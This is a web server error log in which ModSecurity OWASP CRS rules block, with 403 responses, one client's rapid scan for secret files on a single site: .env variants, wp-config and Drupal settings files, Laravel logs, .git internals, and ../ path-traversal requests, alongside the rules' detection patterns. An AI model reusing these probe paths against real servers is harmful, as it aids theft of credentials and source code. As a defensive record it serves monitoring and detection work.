[Tue May 12 02:41:27.484187 2026] [security2:error] [pid 1730207:tid 1730220] [client 93.123.109.165:4162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/config/.env"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P0wAAAUs"]
[Tue May 12 02:41:27.485037 2026] [core:error] [pid 1691274:tid 1691285] [client 93.123.109.165:4274] AH10244: invalid URI path (/storage/../../../.env)
[Tue May 12 02:41:27.485075 2026] [security2:error] [pid 1707624:tid 1707689] [client 93.123.109.165:4176] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/sites/default/settings.php"] [unique_id "agJ3N7OxS7i6i_mT2NLHqwAAAEc"]
[Tue May 12 02:41:27.485183 2026] [security2:error] [pid 1707624:tid 1707689] [client 93.123.109.165:4176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/sites/default/settings.php"] [unique_id "agJ3N7OxS7i6i_mT2NLHqwAAAEc"]
[Tue May 12 02:41:27.485370 2026] [security2:error] [pid 1707624:tid 1707689] [client 93.123.109.165:4176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/sites/default/settings.php"] [unique_id "agJ3N7OxS7i6i_mT2NLHqwAAAEc"]
[Tue May 12 02:41:27.487604 2026] [security2:error] [pid 1691274:tid 1691289] [client 93.123.109.165:4236] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJ3N1fdQaraX_prmqcemgAAAAw"]
[Tue May 12 02:41:27.487666 2026] [security2:error] [pid 1691274:tid 1691289] [client 93.123.109.165:4236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJ3N1fdQaraX_prmqcemgAAAAw"]
[Tue May 12 02:41:27.487762 2026] [security2:error] [pid 1691274:tid 1691289] [client 93.123.109.165:4236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJ3N1fdQaraX_prmqcemgAAAAw"]
[Tue May 12 02:41:27.487941 2026] [security2:error] [pid 1691274:tid 1691289] [client 93.123.109.165:4236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJ3N1fdQaraX_prmqcemgAAAAw"]
[Tue May 12 02:41:27.488871 2026] [core:error] [pid 1707624:tid 1707697] [client 93.123.109.165:4240] AH10244: invalid URI path (/../.env)
[Tue May 12 02:41:27.490933 2026] [security2:error] [pid 1730207:tid 1730209] [client 93.123.109.165:4184] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.backup"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P1AAAAUA"]
[Tue May 12 02:41:27.491043 2026] [security2:error] [pid 1730207:tid 1730209] [client 93.123.109.165:4184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.backup"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P1AAAAUA"]
[Tue May 12 02:41:27.491235 2026] [security2:error] [pid 1730207:tid 1730209] [client 93.123.109.165:4184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.backup"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P1AAAAUA"]
[Tue May 12 02:41:27.493526 2026] [security2:error] [pid 1730207:tid 1730214] [client 93.123.109.165:4196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.txt"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P1QAAAUU"]
[Tue May 12 02:41:27.493579 2026] [security2:error] [pid 1709071:tid 1709092] [client 93.123.109.165:4264] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "of-crystal-lake.net"] [uri "/storage/logs/laravel.log"] [unique_id "agJ3N7vMumyrWMfSu7qpNgAAAMU"]
[Tue May 12 02:41:27.493644 2026] [security2:error] [pid 1730207:tid 1730214] [client 93.123.109.165:4196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.txt"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P1QAAAUU"]
[Tue May 12 02:41:27.493753 2026] [security2:error] [pid 1709071:tid 1709092] [client 93.123.109.165:4264] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/storage/logs/laravel.log"] [unique_id "agJ3N7vMumyrWMfSu7qpNgAAAMU"]
[Tue May 12 02:41:27.493834 2026] [security2:error] [pid 1730207:tid 1730214] [client 93.123.109.165:4196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.txt"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P1QAAAUU"]
[Tue May 12 02:41:27.493930 2026] [security2:error] [pid 1709071:tid 1709092] [client 93.123.109.165:4264] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/storage/logs/laravel.log"] [unique_id "agJ3N7vMumyrWMfSu7qpNgAAAMU"]
[Tue May 12 02:41:27.494049 2026] [security2:error] [pid 1730175:tid 1730185] [client 93.123.109.165:4210] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.production.local"] [unique_id "agJ3N3o6NvB9WXx5V-55dwAAAQg"]
[Tue May 12 02:41:27.494129 2026] [security2:error] [pid 1707624:tid 1707691] [client 93.123.109.165:4312] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php.txt"] [unique_id "agJ3N7OxS7i6i_mT2NLHrQAAAEk"]
[Tue May 12 02:41:27.494188 2026] [security2:error] [pid 1730175:tid 1730185] [client 93.123.109.165:4210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.production.local"] [unique_id "agJ3N3o6NvB9WXx5V-55dwAAAQg"]
[Tue May 12 02:41:27.494261 2026] [security2:error] [pid 1707624:tid 1707691] [client 93.123.109.165:4312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php.txt"] [unique_id "agJ3N7OxS7i6i_mT2NLHrQAAAEk"]
[Tue May 12 02:41:27.494401 2026] [security2:error] [pid 1730175:tid 1730185] [client 93.123.109.165:4210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.production.local"] [unique_id "agJ3N3o6NvB9WXx5V-55dwAAAQg"]
[Tue May 12 02:41:27.494508 2026] [security2:error] [pid 1707624:tid 1707691] [client 93.123.109.165:4312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php.txt"] [unique_id "agJ3N7OxS7i6i_mT2NLHrQAAAEk"]
[Tue May 12 02:41:27.494945 2026] [security2:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.example"] [unique_id "agJ3N1fdQaraX_prmqcemwAAABI"]
[Tue May 12 02:41:27.495050 2026] [security2:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.example"] [unique_id "agJ3N1fdQaraX_prmqcemwAAABI"]
[Tue May 12 02:41:27.495177 2026] [security2:error] [pid 1709071:tid 1709088] [client 93.123.109.165:4244] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.git/HEAD"] [unique_id "agJ3N7vMumyrWMfSu7qpNwAAAME"]
[Tue May 12 02:41:27.495224 2026] [security2:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.example"] [unique_id "agJ3N1fdQaraX_prmqcemwAAABI"]
[Tue May 12 02:41:27.495312 2026] [security2:error] [pid 1709071:tid 1709088] [client 93.123.109.165:4244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.git/HEAD"] [unique_id "agJ3N7vMumyrWMfSu7qpNwAAAME"]
[Tue May 12 02:41:27.495412 2026] [security2:error] [pid 1730175:tid 1730178] [client 93.123.109.165:4200] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.git/logs/HEAD"] [unique_id "agJ3N3o6NvB9WXx5V-55eAAAAQE"]
[Tue May 12 02:41:27.495449 2026] [security2:error] [pid 1707624:tid 1707703] [client 93.123.109.165:4156] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.git/index"] [unique_id "agJ3N7OxS7i6i_mT2NLHrgAAAFU"]
[Tue May 12 02:41:27.495509 2026] [security2:error] [pid 1709071:tid 1709088] [client 93.123.109.165:4244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.git/HEAD"] [unique_id "agJ3N7vMumyrWMfSu7qpNwAAAME"]
[Tue May 12 02:41:27.495516 2026] [security2:error] [pid 1730175:tid 1730178] [client 93.123.109.165:4200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.git/logs/HEAD"] [unique_id "agJ3N3o6NvB9WXx5V-55eAAAAQE"]
[Tue May 12 02:41:27.495538 2026] [security2:error] [pid 1691274:tid 1691284] [client 93.123.109.165:4304] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.git/config"] [unique_id "agJ3N1fdQaraX_prmqcenAAAAAc"]
[Tue May 12 02:41:27.495555 2026] [security2:error] [pid 1707624:tid 1707703] [client 93.123.109.165:4156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.git/index"] [unique_id "agJ3N7OxS7i6i_mT2NLHrgAAAFU"]
[Tue May 12 02:41:27.495649 2026] [security2:error] [pid 1691274:tid 1691284] [client 93.123.109.165:4304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.git/config"] [unique_id "agJ3N1fdQaraX_prmqcenAAAAAc"]
[Tue May 12 02:41:27.495693 2026] [security2:error] [pid 1730175:tid 1730178] [client 93.123.109.165:4200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.git/logs/HEAD"] [unique_id "agJ3N3o6NvB9WXx5V-55eAAAAQE"]
[Tue May 12 02:41:27.495740 2026] [security2:error] [pid 1707624:tid 1707703] [client 93.123.109.165:4156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.git/index"] [unique_id "agJ3N7OxS7i6i_mT2NLHrgAAAFU"]
[Tue May 12 02:41:27.495829 2026] [security2:error] [pid 1691274:tid 1691284] [client 93.123.109.165:4304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.git/config"] [unique_id "agJ3N1fdQaraX_prmqcenAAAAAc"]
